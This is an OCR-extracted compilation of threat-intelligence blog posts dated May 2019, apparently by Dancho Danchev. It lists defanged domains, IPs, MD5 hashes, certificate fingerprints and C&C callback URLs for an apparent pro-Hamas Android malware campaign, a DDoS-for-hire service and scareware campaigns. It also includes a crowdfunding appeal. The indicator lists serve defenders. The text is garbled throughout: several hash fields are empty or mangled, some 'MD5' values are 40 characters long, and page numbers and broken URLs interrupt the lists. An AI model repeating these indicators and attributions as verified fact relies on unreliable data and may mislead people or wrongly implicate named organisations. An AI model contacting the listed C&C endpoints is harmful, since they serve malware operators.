hxxp://Examinenotifyfriends. linfo 
hxxp://Gonewssubspush. info 
hxxp://Hitnewssubspush. info 
hxxp://Inewssubspush. info 
hxxp://Inspectnotifyfriends.info 
hxxp://Justnewssubspush. info 
hxxp://Livenewssubspush. info 
hxxp://Metanewssubspush. info 
hxxp://Newnewssubspush. info 
hxxp://Notifymepush. info 
hxxp://Nunewssubspush. info 
hxxp://Pushmeandtouchme. info 
hxxp://Scannotifyfriends.info 
hxxp://Searchnotifyfriends.info 
hxxp://Testnotifyfriends. info 
hxxp://Thentouchme. info 
hxxp://Topnewssubspush. info 
hxxp://Touchthenpush. info 
hxxp://Trynewssubspush. info 
hxxp://Upnewssubspush. info 
hxxp://Usenotifyfriends.info 


hxxp://Wenewssubspush. info 
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Related malicious and fraudulent domains known to have responded to 109.234.39.160: 


hxxp://ivreprsident.tk 
hxxp://uvrirordre.tk 
hxxp://offriractivit.tk 
hxxp://ermoyen.tk 
hxxp://iterrisque.tk 
hxxp://derchef.tk 
hxxp://echance.tk 
hxxp://terminerespace.tk 
hxxp://rofiterami.tk 
hxxp://evenirweb.tk 
hxxp://nviterinformation.tk 
hxxp://xemple.tk 
hxxp://isercarte.tk 
hxxp://airelaisserquestion.tk 
hxxp://derimage.tk 
hxxp://alsoutenirdomaine.tk 
hxxp://arderplan.tk 
hxxp://rsentermonde.tk 
hxxp://marquerexprience.tk 
hxxp://germatire.tk 
hxxp://rerlivre.tk 
hxxp://ngersource.tk 


hxxp://voyercasino.tk 
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hxxp://onctionnerfrance.tk 
hxxp://raliserpage.tk 
hxxp://nterespace.tk 
hxxp://ectuerpartie.tk 
hxxp://erguerre.tk 
hxxp://nnatrevaleur.tk 
hxxp://fierargent.tk 
hxxp://irmertravers.tk 
hxxp://dcidertemps.tk 
hxxp://irebase.tk 
hxxp://inerpied.tk 
hxxp://limiterprsident.tk 
hxxp://resteraffaire.tk 
hxxp://laisserloi.tk 
hxxp://treterre.tk 
hxxp://iresuite.tk 
hxxp://tenirair.tk 
hxxp://rganiserargent.tk 
hxxp://nelchoisirhistoire.tk 
hxxp://grertte.tk 
hxxp://oncernerpriode.tk 
hxxp://ncerchoix.tk 
hxxp://mpagnercas.tk 
hxxp://permesure.tk 


hxxp://urirproduit.tk 
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hxxp://relieu.tk 
hxxp://sderplan.tk 
hxxp://prparerchance.tk 
hxxp://hergestion.tk 
hxxp://disposerpouvoir.tk 
hxxp://isirtat.tk 
hxxp://dercoup.tk 
hxxp://frersource.tk 
hxxp://suivreobjet.tk 
hxxp://itteranne.tk 
hxxp://anisertude.tk 
hxxp://pparatrecouleur.tk 
hxxp://trouverplaisir.tk 
hxxp://sterenfant.tk 
hxxp://ttervente.tk 
hxxp://ntirgestion.tk 
hxxp://rouverdveloppement.tk 
hxxp://nnelfalloirchoix.tk 
hxxp://merdemande.tk 
hxxp://nnellireapplication.tk 
hxxp://ercoup.tk 
hxxp://tgrertte.tk 
hxxp://moyen.tk 
hxxp://duirecorps.tk 


hxxp://rerespecterministre.tk 
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hxxp://mposerconseil.tk 
hxxp://nnatrevaleur.tk 
hxxp://choisirfemme.tk 
hxxp://nsidreran.tk 
hxxp://rderdomaine.tk 
hxxp://nuerweb.tk 
hxxp://attrecentre.tk 
hxxp://raiterbesoin.tk 
hxxp://leresprit.tk 
hxxp://ontenirforme.tk 
hxxp://nirfonction.tk 
hxxp://chergroupe.tk 
hxxp://rtte.tk 
hxxp://epied.tk 
hxxp://erparis.tk 
hxxp://liserpouvoir.tk 
hxxp://rtagertype.tk 


hxxp://reconnatrefemme.tk 
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Related malicious and fraudulent domains known to have responded to 37.230.116.105: 


hxxp://lpoursuivretat.tk 
hxxp://gycazyuge.tk 
hxxp://optygyty.tk 
hxxp://hurevente.tk 
hxxp://kofojok.tk 
hxxp://expliopjipn.tk 
hxxp://nijiscy.tk 
hxxp://mprendreauteur.tk 
hxxp://vertravers.tk 
hxxp://truirefrance.tk 
hxxp://lokodasre.tk 
hxxp://prendrecorps.tk 
hxxp://iokoivefikolf.tk 
hxxp://hudabertee.tk 
hxxp://larereffet.tk 
hxxp://hnusanuie.tk 
hxxp://pocokie.tk 
hxxp://gysazatre.tk 
hxxp://ssurercentre.tk 
hxxp://iperuvre.tk 
hxxp://ferfreau.tk 


hxxp://poserscurit.tk 
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hxxp://jidytzae.tk 
hxxp://jikogyda.tk 
hxxp://tirsystme.tk 
hxxp://thermesure.tk 
hxxp://plaisijir.tk 
hxxp://tyferet.tk 
hxxp://irefrance.tk 
hxxp://sedkorlor.tk 
hxxp://serfille.tk 
hxxp://ruiyrgion.tk 
hxxp://permettretravers.tk 
hxxp://lpouruiretat.tk 
hxxp://fournirplupart.tk 
hxxp://roposergenre.tk 
hxxp://tircadre.tk 
hxxp://reconnatrechef.tk 
hxxp://oiril.tk 
hxxp://enterguerre.tk 
hxxp://irvaleur.tk 
hxxp://irsocit.tk 
hxxp://hugersoir.tk 
hxxp://jokofasa.tk 
hxxp://gyrecersa.tk 
hxxp://ekotyfereen.tk 


hxxp://kosazagerr.tk 
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hxxp://ioterexu.tk 
hxxp://voirirguerre.tk 
hxxp://stermain.tk 
hxxp://kokofete.tk 
hxxp://uiregy.tk 
hxxp://lodokiv.tk 
hxxp://nedfuheihg.tk 
hxxp://koduhutr.tk 
hxxp://nusadere.tk 
hxxp://gytedexen.tk 
hxxp://jisazabyt.tk 
hxxp://potycerer.tk 
hxxp://lopotyre.tk 
hxxp://huqerwerite.tk 
hxxp://rtircouleur.tk 
hxxp://tirhujmort.tk 
hxxp://huderesen.tk 
hxxp://expliqueren.tk 
hxxp://uihytyf.tk 
hxxp://ikiryve.tk 
hxxp://jisazajic.tk 
hxxp://hudasarete.tk 
hxxp://potijife.tk 
hxxp://Isejikog.tk 


hxxp://gytlsentirsite.tk 
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hxxp://tiosuivremillion.tk 
hxxp://kojerconseil.tk 
hxxp://okinterlien.tk 
hxxp://tenterargent.tk 
hxxp://eordre.tk 
hxxp://onterami.tk 
hxxp://vrirvente.tk 
hxxp://nerbesoin.tk 
hxxp://nertiko.tk 
hxxp://geolorge.tk 
hxxp://gyvercherdroit.tk 
hxxp://bokosabe.tk 
hxxp://Isjifferde.tk 
hxxp://dyjursite.tk 
hxxp://lopofibut.tk 
hxxp://cevoirguerre.tk 
hxxp://atteindreair.tk 
hxxp://ardermillion.tk 
hxxp://koiterplace.tk 
hxxp://travaillersite.tk 
hxxp://cuperquipe.tk 
hxxp://ferdplaisir.tk 
hxxp://Isentirsite.tk 
hxxp://tsuivremillion.tk 


hxxp://eciotersystme.tk 
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hxxp://ortercration.tk 
hxxp://koeioijfgel.tk 
hxxp://ituerexemple.tk 
hxxp://olravaillersant.tk 
hxxp://poloeioijfgel.tk 
hxxp://pliquerformation.tk 
hxxp://tsortirgouvernement.tk 
hxxp://vkojrguerre.tk 
hxxp://kijiirraison.tk 
hxxp://ndreterme.tk 
hxxp://iterplace.tk 
hxxp://oposerprojet.tk 
hxxp://Idclarerplace.tk 


hxxp://permort.tk 


Related malicious and fraudulent domains known to have participated in the campaign 
(138.68.113.179; 172.64.196.39; 172.64.197.39; 104.27.170.199; 104.27.171.199): 


6139 


hxxp://click.newsfeed.support 
hxxp://soprano.newsfeed.support 
hxxp://clarify.newsfeed.support 
hxxp://theater.newsfeed.support 
hxxp://impress.newsfeed.support 
hxxp://urgency.newsfeed.support 
hxxp://thinker.newsfeed.support 
hxxp://glasses.newsfeed.support 
hxxp://qualify.newsfeed.support 
hxxp://warning.newsfeed.support 
hxxp://scandal.newsfeed.support 
hxxp://minimum.newsfeed.support 
hxxp://general.newsfeed.support 
hxxp://glimpse.newsfeed.support 
hxxp://extreme.newsfeed.support 
hxxp://officer.newsfeed.support 
hxxp://silence.newsfeed.support 
hxxp://capital.newsfeed.support 
hxxp://voucher.newsfeed.support 


hxxp://dentist.newsfeed.support 


i. ttps://www.flashpoint-intel.com/blog/after-action-report-flashpoint-remediation-of-0-day-exploit-on-ow 


public-facing-website/ 


2. https: //www.scmagazine.com/home/security-news/flashpoint-our-site-was-not-dishing-malware/ 


ttps://www.anti-malware.name/news/expert-accused-intel-flashpoint-website-in-spread-of-malware-while-co 


3. 
pany-denies-accusations/ 


4. https://www.enterprisetimes.co.uk/2019/04/26/flashpoint-reacts-to-claim-website-served-malware/ 


5. https://news.rambler.ru/internet/42088442-sayt-flashpoint-rasprostranyaet-vredonos-flashpoint-net/ 


6. https: //www.flashpoint-intel.com/ 
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15.5 May 


15.5.1 Upcoming Personal Hacking Memoir - Soliciting Feedback and Research Ques- 
tion (2019-05-04 04:43) 


15.5.2 Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas 
Online Infrastructure (2019-05-04 19:45) 


Love them or hate them - the ubiquitous beautiful girl utilizing fake bogus and rogue Facebook 
accounts scam campaign courtesy of Hamas targeting Israeli soldiers has to come to an end. 


In this post I’ll provide actionable intelligence on a currently active Pro-Hamas malicious 
and fraudulent infrastructure and will discuss in-depth the tactics techniques and procedures 
of the cybercriminals behind it and will offer in-depth perspective on a currently active 
Pro-Hamas hosting provider - "[1J/Nepras for Media & IT" which is basically a legitimate 
front-end company currently involved in a variety of Pro-Hamas malicious and fraudulent 
malware-serving and propaganda spreading online infrastructure provider directly related to 
yet another Pro-Hamas franchise - "Modern Tech Corp". 


Sample Facebook Profile Names involved in the campaign: 
Elianna Amer 

Aitai Yosef 

Karen Cohen 

Amit Cohen 

Loren Ailan 

Verena Sonner 


Lina Kramer 


Sample profile photos of Pro-Hamas fake and rogue Facebook accounts: 
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Sample malicious and fraudulent URL known to have participated in the campaign: 


hxxp://apkpkg.com/android/?product=yeecallpro 


50.63.202.56 


50.63.202.43; 


Related malicious MD5s known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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8f1b709ae4fb41b32674ca8c41bfcbf7 


95a782bd8711ac14ad76b068767515d7 


5b2aac6372deal67c737b0036e1bd515 


f6ffa064a492e91854d35e7f225b1313 


b3e40659ae0a0852e2f6eb928d402d9d 


7a9503152b4c8clee80ac7daf5405a91 


50.87.148.131; 


Related malicious and fraudulent domains known to have participated in the campaign: 


hxxp://goldncup.com 


hxxp://glancelove.com - 204.11.56.48; 198.54.117.1; 198.54.117.198; 198.54.117.200; 
198.54.117.197; 192.64.118.163 


hxxp://autoandroidup.website 


hxxp://mobilestoreupdate.website 


hxxp://updatemobapp.website 


Related malicious IPs known to have participated in the campaign: 


hxxp://107.175.144.26 


hxxp://192.64.114.147 


Related malicious MD5s known to have participated in the campaign: 


MD5 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


: 4f9383ae4d0285aeb86e56797f3193f7 


95a782bd8711ac14ad76b068767515d7 


b3e40659ae0a0852e2f6eb928d402d9d 


f6ffa064a492e91854d35e7f225b1313 


8f1b709ae4fb41b32674ca8c41bfcbf7 


5b2aac6372deal67c737b0036e1bd515 


7a9503152b4c8clee80ac7daf5405a91 


Related malicious and fraudulent phone-back C &C server IPs: 


hxxp://endpointup.com/update/upfolder/updatefun.php 


hxxp://droidback.com/pockemon/squirtle/functions.php 
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Related malicious and fraudulent domains known to have participated in the campaign: 
hxxp://androidbak.com 

hxxp://droidback.com 

hxxp://endpointup.com 

hxxp://siteanalysto.com 


hxxp://goodydaddy.com 


Related emails known to have participated in the campaign: 
info@palgoal.ps 
support@nepras.com 


mtcg@mtcgaza.com 


Related fraudulent and malicious domains known to have been registered using the 
same email - info@palgoal.ps: 


hxxp://7qlp.com 
hxxp://all-inl.net 
hxxp://androidmobgate.com 
hxxp://arabstonight.com 
hxxp://collectrich.com 
hxxp://krmalk.com 
hxxp://motionsgraphic.com 
hxxp://orchidcollege.com 
hxxp://paltrainers.org 
hxxp://rosomat.net 


hxxp://stikerscloud.com 
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Related fraudulent and malicious domains known to have been 
same email - support@nepras.com: 


hxxp://acchd.net 
hxxp://ahlulquran.com 
hxxp://alalbait.ps 
hxxp://alnorhan.com 
hxxp://alowini.com 
hxxp://alresalah.news 
hxxp://alshibl.com 
hxxp://alwanbook.com 
hxxp://arqamschools.com 
hxxp://azarcnc.com 
hxxp://boxmarket.org 
hxxp://bstcover.com 
hxxp://caades.org 
hxxp://detour-bs.com 
hxxp://driverup2date.com 
hxxp://drmazen.com 
hxxp://drmazen.ps 
hxxp://eta-water.com 
hxxp://fares-alarab.com 
hxxp://feker.net 
hxxp://fekerjaded.net 


hxxp://fekerjaded.com 


registered using the 
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hxxp://gaza-health.com 
hxxp://gcstv.tv 
hxxp://hairgenomics.com 
hxxp://idco.center 
hxxp://islamicbl.com 
hxxp://khaledjuma.net 
hxxp://kingtoys.ps 
hxxp://learningoutcome.net 
hxxp://lemaghi.com 
hxxp://ISugaza.org 
hxxp://mailsinfo.net 
hxxp://majallaa.com 
hxxp://manara.ps 
hxxp://mobilyapp.com 
hxxp://mtsc.tech 
hxxp://nepras.net 
hxxp://nepras.ps 
hxxp://nsms.ps 
hxxp://osamaalnajjar.com 
hxxp://osratyorg.com 
hxxp://panorama-pvs.com 
hxxp://pay2earn.net 
hxxp://pharmahome.net 
hxxp://saqacc.com 


hxxp://saudifame.com 
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hxxp://scc-online.net 
hxxp://sondooq.net 
hxxp://syada.org 
hxxp://takafulsys.com 
hxxp://taqat.work 
hxxp://taqat.jobs 
hxxp://technologylotus.com 
hxxp://thoraya.net 
hxxp://vgsat.com 
hxxp://yabous.net 


hxxp://yourav.net 


Related domains registered using "Nepras for Media & IT" infrastructure: 


hxxp://googlemapsservice.com 


hxxp://lipidgenomics.com 
hxxp://akalgroup.net 
hxxp://rami-kerenawi.com 
hxxp://bestyleperfumes.com 
hxxp://azarcnc.com 
hxxp://go-2web.com 
hxxp://jettafood.com 
hxxp://mushtahatours.com 
hxxp://pal4news.net 
hxxp://pcr-shate.com 


hxxp://saqacc.com 
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hxxp://shahidvideo.com 
hxxp://shop8d.net 
hxxp://spermgenomics.com 
hxxp://tawjihips.com 
hxxp://vidioarb.com 
hxxp://yourav.net 
hxxp://yourdialerpal.com 
hxxp://freedombeacon.info 
hxxp://neprastest.info 
hxxp://nirmaali.com 
hxxp://zaibaq-hearing.com 
hxxp://bramgsoft.com 
hxxp://hairgenomics.com 
hxxp://dietgenomix.com 
hxxp://arcadialanguages.com 
hxxp://himoudco.com 
hxxp://moltkaa.com 
hxxp://toyoorjanna.com 
hxxp://facebootshe.com 
hxxp://facebootshe.net 
hxxp://somoood.com 
hxxp://alnorhan.com 
hxxp://alwatantoday.net 
hxxp://elianali.com 


hxxp://sspal.net 
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hxxp://hi-galaxy.com 
hxxp://youthn.net 
hxxp://gmamalaysia.com 
hxxp://cbspgaza.com 


hxxp://madarikmedia.com 


hxxp://website-testnew.com 


hxxp://childworldsociety.com 


hxxp://netmarketpal.net 
hxxp://alowwaba.com 
hxxp://saudib.info 
hxxp://pwaha.com 
hxxp://smilymedia.com 
hxxp://ftyatalghad.com 
hxxp://coldymedia.com 
hxxp://kh-alsendawy.com 
hxxp://scoutsyalla.com 
hxxp://almofker.com 
hxxp://rawnaqmedia.net 
hxxp://pro-stud.com 
hxxp://shawa-plast.com 
hxxp://eta-water.com 
hxxp://host4tech.net 
hxxp://fekerjaded.com 
hxxp://audioodrivers.com 


hxxp://trsanweb.com 
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hxxp://3almpro.com 
hxxp://neprasweb.info 
hxxp://thaqefnafsak.net 
hxxp://newpal21.com 
hxxp://ads4market.net 
hxxp://qcpalestineforum.net 
hxxp://alothmanx.com 
hxxp://detourbs.com 
hxxp://engash.com 
hxxp://anafenyx.com 
hxxp://dar-pal.com 
hxxp://loyal-hands.com 
hxxp://sahabacomplex.net 
hxxp://logintest.info 
hxxp://mapartnr.com 
hxxp://hejazeceramics.com 
hxxp://gazaapeal.com 
hxxp://tawzzef.com 
hxxp://gazaappeal.com 
hxxp://oqpizza.com 
hxxp://arqamschools.com 
hxxp://nafhacenter.com 
hxxp://halaalmasry.com 
hxxp://q9polls.com 


hxxp://q8-polls.com 
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hxxp://palalghadschool.com 
hxxp://servesni.com 
hxxp://rose2020.com 
hxxp://km-pal.com 
hxxp://cfpalestine.com 
hxxp://ipad2me.com 
hxxp://arabsdownload.com 
hxxp://projectsinturkey.com 
hxxp://newmassa.com 
hxxp://charitysys.info 
hxxp://nepraswebsite.com 
hxxp://iquds.com 
hxxp://yabous.net 
hxxp://appsapkandroid.us 
hxxp://alltech4arab.com 
hxxp://hadaf.info 
hxxp://plmedgroup.com 
hxxp://modhish.net 
hxxp://mitaka.com 
hxxp://ajelapp.com 
hxxp://khmap.com 
hxxp://cupsport.net 
hxxp://arshdnytech.com 
hxxp://gmaedu.net 


hxxp://lemaghi.com 
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hxxp://creativityjob.com 
hxxp://imes-group.net 
hxxp://rawnaqmedia.com 
hxxp://alwanbook.com 
hxxp://fifafoot.com 
hxxp://sportarabs.com 
hxxp://el-qalam.com 
hxxp://bawadirsoft.com 
hxxp://palalghad-school.com 
hxxp://mixedwork.com 
hxxp://plmedgroup.com 
hxxp://alowini.com 
hxxp://detour-bs.com 
hxxp://earningoutcome.net 
hxxp://shahedcom.com 
hxxp://sport-kora.com 
hxxp://torathshop.com 
hxxp://newsolararabian.com 
hxxp://h3sk.com 
hxxp://gh-gaza91.com 
hxxp://watanps.com 
hxxp://mobilyapp.com 
hxxp://nfs-pal.com 
hxxp://yousef123.com 


hxxp://alhato.com 


6160 


hxxp://alyawmpress.net 


hxxp://technologylotus.com 


hxxp://qavalues.com 
hxxp://ask2play.net 
hxxp://hamasid.com 
hxxp://bhscfood.com 
hxxp://nmanews.com 
hxxp://ifcdoha4.com 
hxxp://sparkpowerco.net 
hxxp://archour.com 
hxxp://nmanews.net 
hxxp://academy-uk.net 


hxxp://turkey-gate.com 


hxxp://learningoutcome.net 


hxxp://smattrix.com 
hxxp://eradaa.net 
hxxp://paltoday.com 


hxxp://sugar-salt.net 


hxxp://boutiqobasket.com 


hxxp://ethadalpadia.com 
hxxp://fonoungallery.com 
hxxp://fonoungallery.com 
hxxp://smattrix.com 
hxxp://gazawiit.com 


hxxp://alfarisnt.com 
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hxxp://lama-film.net 


Related domains registered using "Nepras for Media & IT" infrastructure: 
hxxp://lovemagazineofficial.com 
hxxp://masmo7.com 
hxxp://mnwrna.com 
hxxp://androidbak.com 
hxxp://fastdroidmob.com 
hxxp://treestower.com 
hxxp://aymanjoda.com 
hxxp://advflameco.com 
hxxp://mahmoudzuaiter.com 
hxxp://libyatoda.com 
hxxp://mtcpal.com 
hxxp://khfamilies.com 
hxxp://ch2t0.com 
hxxp://dwratcom.com 
hxxp://faker4.com 
hxxp://orubah.com 
hxxp://orchidcollege.com 
hxxp://yasser-arafat.com 
hxxp://wf-hall.com 
hxxp://maharaty.net 
hxxp://addoja.net 


hxxp://arb10.com 


6162 


hxxp://ajel-news.com 
hxxp://rosomat.net 
hxxp://sahifty.net 
hxxp://looktik.com 
hxxp://pstent.com 
hxxp://newsmagasine.com 
hxxp://gazass.com 
hxxp://dooownloads.com 
hxxp://androidmobgate.com 
hxxp://koora-fast.com 
hxxp://fitlifee.com 


hxxp://share-crowd.com 


Related domains registered using the "Modern Tech Corp" Pro-Hamas fraudulent and 
malicious infrastructure: 


hxxp://atfalocom.com 
hxxp://bopfile.com 
hxxp://djadet.com 
hxxp://ecsrs.com 
hxxp://egp-gaza.com 
hxxp://infoocean.net 
hxxp://katakeety.com 
hxxp://katakeety.net 
hxxp://linefood.com 
hxxp://mtcpal.net 


hxxp://nawrastv.net 
6163 


hxxp://shobbaik.com 
hxxp://tashbik.biz 
hxxp://tashbik.com 
hxxp://vansac-english.com 
hxxp://woodrom.com 
hxxp://alfareeq.info 
hxxp://tashbik.info 
hxxp://cashbacksave.com 
hxxp://nerab.com 
hxxp://download4android.com 
hxxp://altartosi.net 
hxxp://fostanews.com 
hxxp://silverdai.com 
hxxp://selhelou.com 
hxxp://albassam-co.com 
hxxp://almanar-studio.com 
hxxp://facekooora.com 
hxxp://holylandcar.com 
hxxp://qneibi.com 
hxxp://shaheen-flower.com 
hxxp://strong-k.com 
hxxp://pioneerfoodco.com 
hxxp://sinokrotex.com 
hxxp://zawiaa.net 


hxxp://amwwal.com 
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hxxp://abuamra.com 
hxxp://madridista-arab.com 
hxxp://donia-fm.com 
hxxp://donia-fm.net 
hxxp://Imasatfnya.com 
hxxp://dolphinexpress1.com 
hxxp://dolphinexpress1.info 
hxxp://dolphinexpress1.net 
hxxp://radiosurif.com 
hxxp://sahaba-radio.com 
hxxp://odmint.com 
hxxp://ylapin.com 
hxxp://ylapin.net 
hxxp://mypage-pro.com 
hxxp://mohdsheikh.com 
hxxp://altelbany.com 
hxxp://dolphinariumtours.com 
hxxp://artsofali.com 
hxxp://menalmuheetlelkhaleej.com 
hxxp://alghaidaa.com 
hxxp://ajwad-marble.com 
hxxp://istakbel.com 
hxxp://istaqbel.com 
hxxp://istaqbil.com 


hxxp://istaqbl.com 
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hxxp://istqbl.com 
hxxp://estakbel.com 
hxxp://estaqbel.com 
hxxp://estaqbil.com 
hxxp://estaqbl.com 
hxxp://estqbl.com 
hxxp://massrefy.com 
hxxp://massrify.com 
hxxp://amwwaly.com 
hxxp://amwwaly.info 
hxxp://amwwaly.net 
hxxp://nawrastv.com 
hxxp://stepcrm.com 
hxxp://imraish.com 
hxxp://zawiaa.com 
hxxp://3la-kefak.com 
hxxp://bsaisofamily.com 


hxxp://imraish.com 


Related malicious MD5s known to have participated in the campaign: 
MD5: 10f27d243adb082ce0f842c7a4a3784b01f7248e 

MD5: b8237782486a26d5397b75eeea7354a777bff63a 

MD5: 09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813 

MD5: 9b923303f580c999f0fdc25cad600dd3550fe4e0 


MD5: 0b658c883efe44ff010f1703db00c9ff4645b59df 
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MD5: 0a5dc47b06de545d8236d70efee801ca573115e7 
MD5: 782a0e5208c3d9e8942b928857a24183655e7470 
MD5: 5f71a8a50964dae688404ce8b3fbd83d6e36e5cd 


MD5: 03b404c8f4ead4aa3970b26eeeb268c594b1bb47 


Related certificates known to have participated in the campaign: 
10:EB:7D:03:2A:B9:15:32:8F:BF:68:37:C6:07:45:FB:DF:F1:87:A6 
9E:52:71:F3:D2:1D:C3:22:28:CB:50:C7:33:05:E3:DE:01:EB:CB:03 
44:52:E6:4C:97:4B:6D:6A:7C:40:AD:1E:E0:17:08:33:87:AA:09:09 
67:43:9B:EE:39:81:F3:5E:10:33:C9:7A:D9:4F:3A:73:3B:B0:CF:0A 
89:C8:E2:E3:4A:23:3C:A0:54:A0:4A:53:D6:56:C8:2D:4A:8D:80:56 


B4:D5:0C:8B:73:CB:A9:06:8A:B3:F2:49:35:F8:58:FE:A2:3E:2E:3A 


Related malicious MD5s known to have participated in the campaign including C &C 
phone-back locations: 


MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7 - once executed the sample phones back to 
the following malcious domain - hxxp://onalbertwebsite.OOOwebhostapp.co m 


MD5: 95a782bd8711ac14ad76b068767515d7 - once executed the sample phones back 
to the following malicious domains - hxxp://107.175.144.26/apps/d/p/op.php -> hxxp://app- 
measurement.com/config/app/1:487050065789:android:6a899b85b 4fafd55?app _instance 
_id=76d4b711C98c3632398d47cb8d5777a3 &platform=android &gmp _version=11200 

MD5: 5b2aac6372deal67c737b0036e1bd515 


MD5: f6ffa064a492e91854d35e7f225b1313 - once executed the sample phones back to 
the followin malicious domain - hxxp://192.64.114.147/apps/d/p/op.php 


MD5: b3e40659ae0a0852e2f6eb928d402d9d 


MD5: 7a9503152b4c8clee80ac7daf5405a91 


Related malicious MD5s known to have participated in the campaign: 
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MD5: flb709ae4fb41b32674ca8c41bfcbf7 
MD5: 95a782bd8711ac14ad76b068767515d7 
MD5: 5b2aac6372dea167c737b0036e1bd515 
MD5: f6ffa064a492e91854d35e7f225b1313 
MD5: b3e40659ae0a0852e2f6eb928d402d9d 


MD5: 7a9503152b4c8clee80ac7daf5405a91 


Related malicious URL known to have participated in the campaign: 


hxxp://bit.ly/2M7E2Zg 


1. https://www.terrorism-info.org.il/Data/articles/Art_20397/E_188_12_177323293. pdf 


15.5.3 Historical OSINT - Profiling the Loads.cc Enterprise (2019-05-04 22:27) 
Remember [1]loads.cc? In this post I'll provide actionable intelligence on the popular DDoS 
for hire service circa 2008 and offer in-depth perspective on the tactics utilized by the gang 


behind the service for the purpose of earning fraudulent revenue in the process of monetizing 
access to malware-infected hosts. 


Sample malicious and fraudulent infrastructure known to have participated in the cam- 
paign: 


hxxp://loads.cc - hxxp://nsl.udnska.cn (72.21.52.99), interestingly, hxxp://sateliting.cn is 
the C &C for hxxp://loads.cc service. 


Related malicious and fraudulent URLs known to have participated in the campaign: 
hxxp://sateliting.cn/? &v=exp6 &lid=1033 

hxxp://sateliting.cn/? &v=iron &lid=1033 

hxxp://sateliting.cn/? &v=1810kj &lid=1033 

hxxp://sateliting.cn/? &v=Loko &lid=1033 


hxxp://sateliting.cn/? &v=mporlova &lid=1033 
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hxxp://satelit-ing.cn/? &v=mporlova &lid=1033 


hxxp://sateliting.cn/? &v=gto &lid=1033 


Related malicious IPs known to have responded to sateliting.cn: 
hxxp://50.117.116.117 

hxxp://216.172.154.34 

hxxp://50.117.122.90 

hxxp://205.164.24.45 

hxxp://50.117.116.205 

hxxp://50.117.116.204 


hxxp://65.19.157.227 


Related malicious MD5s known to have participated in the campaign: 
MD5: eb0e25f2ac8f50590e3a00dcf7 66ef02 

MD5: 48cf9b8b063715bb53e691da61601a73 

MD5: Ob63dc08da4Ofcaf532847cfa5d9fc12 

MD5: Oabaffe7d19c382d6dc94e40b27f199b 

MD5: 0844b755c7e26c8051ab23369f720a4b 

MD5: 2f3e270c37b48523e3e89ab76a012092 


1. https: //ddanchev. blogspot .com/2008/03/loadscc-ddos-for-hire-service htm 


15.5.4 Historical OSINT - Massive Scareware Serving Campaign Spotted in the Wild 
(2019-05-04 22:41) 


With scareware continuing to proliferate I’ve recently intercepted a currently active mali- 
cious and fraudulent blackhat SEO campaign successfully enticing thousands of users into 
interacting with the rogue and malicious software with the scareware behind the campaign 
successfully modifying the HOSTS on the affected host potentially exposing the user to a 
variety of fake search engines type of rogue and fraudulent and malicious activity. 
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In this post I’ll provide actionable intelligence on the infrastructure behind the campaign. 


Sample malicious URL known to have participated in the campaign: 
hxxp://guardsys-zone.com/?p=WKmimHVmaWyHjsblo22EexZe0KCf- 


ZlbVOoOKDb2YmMHW)jOxaCbk X1 %2Bal6orKWekJXIZWhimmVummWIO6THodjXoGjdpq- 
mikpVuZ21uaHFtb1 %2FEKKE %3D 


Sample malicious MD5 known to have participated in the campaign: 


MD5: 665480a64d4f72a33120251c968e9c28 


Once executed the sample modifies the HOSTS and redirects them to the following do- 
mains: 


hxxp://google-reseach.com/gfeed/click.php?q= &p=1 - 66.36.243.201 


hxxp://google-reseach.com/search.php? &aff=32210 &saff=0 &q= 


Related malicious rogue and fraudulent URL known to have participated in the cam- 
paign: 


hxxp://88.85.73.139/landing/ 


Sample rogue and fraudulent payment processed used in the campaign: 

hxxp://safetyself.com/safereports/ - 88.85.73.139 

15.5.5 Astalavista Security Group 2.0 - The Underground - Official Launch Announce- 
ment (2019-05-05 13:21) 

Dear blog readers, | wanted to let you know that I’ve recently launched a currently [1]active 

Indiegogo crowd-funding campaign regarding my favorite working place throughout the 90’s - 


Astalavista Security Group and | wanted to find out whether you might be interested in spread- 
ing the word regarding the campaign including a possible donation. 
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Consider going through the following already published Updates and making a donation: 


01. [2]New Update - Official Campaign Announcement 

02. [3]New Update - Official Astalavista 2.0 - Press Release Launch 
03. [4]New Update - Official Astalavista 2.0 - Statement of Work 
04. [5]New Update - Official Astalavista 2.0 - The Big Idea 


05. [6]New Update - Official Astalavista 2.0 - The Fanciful Story 


Feel free to reach me at dancho.danchev@hush.com 


Stay tuned! 


. indiegogo.com/projects/astalavista-security-2-0-a-hacker- in-every-home 
. indiegogo. com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/1 
. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/2 


. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/ 


. indiegogo. com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/4 


Oe) Sw NS 


. indiegogo. com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/ 


15.5.6 Historical OSINT - Yet Another Massive Scareware Serving Campaign Cour- 
tesy of the Koobface Gang (2019-05-05 16:47) 


It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent 


scareware-serving Campaign courtesy of the Koobface Gang this time successfully typosquat- 
ting my name within its command and control infrastructure. 


In this post I’ll provide actionable intelligence behind the campaign and will discuss in- 
depth the infrastructure behind it. 


Sample malicious and fraudulent domains known to have participated in the campaign: 


hxxp://qjcleaner.eu/hitin.php?affid=02979 


Sample malicious MD5 known to have participated in the campaign: 
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MD5: 8df3e9c50bb4756f4434a9b7d6c23c8c 


Once executed a sample malware phones back to: 


hxxp://212.117.160.18/install.php?id=02979 


which is basical ly our dear friends at AS44042 ROOT-AS root eSolutions 


Parked at the same IP where [1]Crusade Affiliates continue serving a diverse set of fake 
security software are also [2]more scareware domains. 


It’s also worth pointing out that the Koobface gang has recently started typosquatting various 
domains using my name. Koobface gang is [3]typosquatting my name for registering domains 
([4]for instance Rancho Ranchev; Pancho Panchev etc.) including hxxp://mayernews.com - 
which is registered to Danchev Danch (landruh.al@gmail.com). 


1. https://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.htm 

2. https: //ddanchev. blogspot .com/2010/05/koobface-gang-responds-to-10-things-you.htm 
3. https: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 

4. : 


